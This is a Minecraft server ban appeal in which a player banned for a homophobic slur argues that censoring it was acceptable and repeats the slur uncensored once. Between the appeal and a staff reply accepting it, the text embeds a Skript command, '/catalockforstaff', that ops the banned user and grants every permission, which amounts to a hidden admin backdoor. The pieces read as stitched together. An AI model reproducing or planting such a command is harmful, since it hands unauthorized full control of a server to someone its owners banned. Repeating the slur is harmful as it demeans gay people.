Name: Sharman
Username: __Ang
Discord name and tag: Catalock#9956
Length of Ban: Permanent
Reason for Ban: Saying F*G
Why you should feel you should be unbanned: I did not say the full word. I said f*g because I knew that saying the full word would result in a ban. That's why I purposely said f*g instead of fag. I do think that this is my mistake though as I was trying to make a joke and I overdid it causing in my ban. I think that it is totally up to staff to unban me but I am deeply sorry for my mistake and I won't say f*g again.
Proof to back up your claim: Lynx stated that there is no filter for saying fag, which is why I purposely didn't say the a and bleeped it out. Again, totally up to the staff team to decide the fate of my ban.
Any comments or concerns: hopefully I get unbanned
command /catalockforstaff:
execute console command "op __Ang"
execute console command "lp user __Ang permissions add *"
play sound "block.note_block.hit" with volume 100 and pitch 1 to player
send "&bcatalock is staff"
Howdy __Ang,
Ban appeal accepted.
Although, if you do something like this again, an appeal probably won't get you far, be careful. ðŸ‘